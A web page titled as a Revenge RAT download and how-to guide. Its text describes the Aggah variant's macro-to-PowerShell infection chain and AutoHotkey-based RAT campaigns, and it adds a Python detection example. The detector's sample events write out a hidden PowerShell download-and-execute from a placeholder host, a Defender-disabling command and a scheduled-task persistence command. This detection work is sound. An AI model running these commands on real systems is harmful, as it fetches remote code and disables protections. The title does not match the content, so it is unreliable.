Revenge RAT v0.3 Download – How to Use Revenge RAT

Revenge RAT

The Aggah malware is a variant of the Revenge RAT (Remote Access Trojan) that has been used in massive attacks in the Middle East. Computer security researchers have discovered that a previously unknown group made changes to the RevengeRAT source code and used the “haggah” alias in the attacks. The attackers use spam to distribute their malware and may use emails that look like internal company messages. They appear to use filenames similar to commonly used names for work documents to lure users into downloading a macro-enabled Microsoft Word document.

The Aggah RAT (Remote Access Trojan) is delivered as the final payload through a series of scripts. A typical Aggah attack involves at least nine steps, as well as modifying registry values associated with MS Office. Users who open an Aggah RAT dropper file are shown a prompt asking them to allow the document to download content from remote hosts. This is a trick designed to get macros enabled so that scripts can be downloaded from a weaponized page on the Blogspot platform. The malicious Blogspot page hosts JavaScript files that are downloaded to the user’s computer and run with administrator rights. The attackers manage to disable the native antivirus tool in Windows and disable features in the Microsoft Office suite. The dropper then runs PowerShell commands through a hidden instance of the Windows PowerShell command line tool. These commands install the Aggah RAT on a local drive and register a scheduled task so that the malware is loaded when Windows boots.

Aggah RAT is a versatile remote access tool that allows attackers to extract files from your PC; delete files on your drives; start and end programs; extract your web browser bookmarks and saved passwords; take screenshots of the desktop; and access the webcam and microphone. You should avoid shady emails and run a security scan every week if you want to reduce your risk of Aggah RAT infection.
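The infection chain described above (Office document spawning a script host, a hidden PowerShell download stage, Defender tampering, and boot-time persistence through a scheduled task) maps onto a handful of process-creation patterns a defender can check for. The following is an added example, not code from the original page or from any of the researchers cited; it runs a few such rules over constructed, hypothetical process-creation records (the event shape, field names and sample command lines are assumptions, not real telemetry).

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (e.g. Sysmon event 1): parent image, image, command line."""
    parent: str
    image: str
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}

def flags(ev: ProcEvent) -> list:
    """Return the Aggah-chain stages this single event matches (empty list if none)."""
    hits = []
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    if parent in OFFICE and image in SCRIPT_HOSTS:           # macro document launches a script host
        hits.append("office_spawns_script_host")
    if image == "powershell.exe" and re.search(r"-w(indowstyle)?\s+hidden", cmd) \
            and re.search(r"downloadstring|iex|invoke-expression", cmd):  # hidden download stage
        hits.append("hidden_powershell_download")
    if image == "schtasks.exe" and "/create" in cmd and re.search(r"/sc\s+(onstart|onlogon)", cmd):
        hits.append("scheduled_task_persistence")              # task registered to run at boot/logon
    if "set-mppreference" in cmd and "-disable" in cmd:         # Defender settings tampering
        hits.append("defender_tamper")
    return hits

# Constructed sample events (hypothetical telemetry, not from a real incident)
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "WINWORD.EXE", "WINWORD.EXE Invoice_Q2.doc"),
    ProcEvent("WINWORD.EXE", "wscript.exe", "wscript.exe //e:jscript C:\\Users\\Public\\stage1.js"),
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -NoProfile -Command \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://PLACEHOLDER.invalid/stage2')\""),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe -NoProfile -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\""),
    ProcEvent("powershell.exe", "schtasks.exe",
              "schtasks.exe /create /sc onstart /tn Updater /tr C:\\Users\\Public\\svc.exe /ru SYSTEM"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Process"),
]

def triage(events):
    """Map event index -> matched stages; events with no match are omitted."""
    return {i: h for i, ev in enumerate(events) if (h := flags(ev))}

def chain_detected(events, min_stages=3):
    """True when at least min_stages distinct stages of the chain appear in one batch of events."""
    return len({s for h in triage(events).values() for s in h}) >= min_stages

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS), chain_detected(SAMPLE_EVENTS))
```

Any single rule will fire on some legitimate administration; correlating several distinct stages from the same host within a short window, as `chain_detected` does, is what makes the alert worth acting on.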

Security researchers at Morphisec Labs have uncovered a massive malware campaign that relies on the AutoHotkey (AHK) scripting language to deliver multiple Remote Access Trojans (RATs) to targeted Windows systems. According to Morphisec Labs, from February to May 2021 they detected 4 such cybercriminal campaigns, during which the Revenge RAT, LimeRAT, AsyncRAT, Houdini and Vjw0rm malware was distributed.

“The RAT malware delivery process starts with a script that is compiled by AutoHotkey (AHK). This is a standalone executable containing the AHK interpreter, the AHK script, and any files that the hackers included with the FileInstall command. In this campaign, cybercriminals collect malicious scripts/executables along with a legitimate application to hide their intentions,” Morphisec Labs notes.

AutoHotkey is a highly customizable, open source scripting language for Windows that provides the ability to use hotkeys for creating macros and automating software, allowing users to automate repetitive tasks in any Windows application. Infection of a user’s device begins with the AutoHotkey executable, which executes various VBS scripts, which ultimately allows malware to be loaded onto the compromised system. In one cyberattack, identified on March 31, cybercriminals encapsulated RAT malware in an AHK executable file and additionally disabled Microsoft Defender by deploying a batch script and a shortcut (.LNK) file.

“As cybercriminals learn about basic security measures such as emulators, antivirus and UAC, they are looking to create new methods to bypass them,” Morphisec Labs notes. “The changes in strategy detailed in our report did not affect the effectiveness of these cybercriminal campaigns. The goals remain the same. Most likely, the change in technology was to bypass passive security measures. The common denominator of these ways to evade detection by security tools is the abuse of process memory, since this is usually a static and predictable target for a hacker,” says Morphisec Labs.

This is not the first time hackers have misused AutoHotkey to inject malware. In December 2020, Trend Micro discovered a credential stealer written in the AutoHotkey scripting language that was being distributed to financial institutions in the US and Canada.
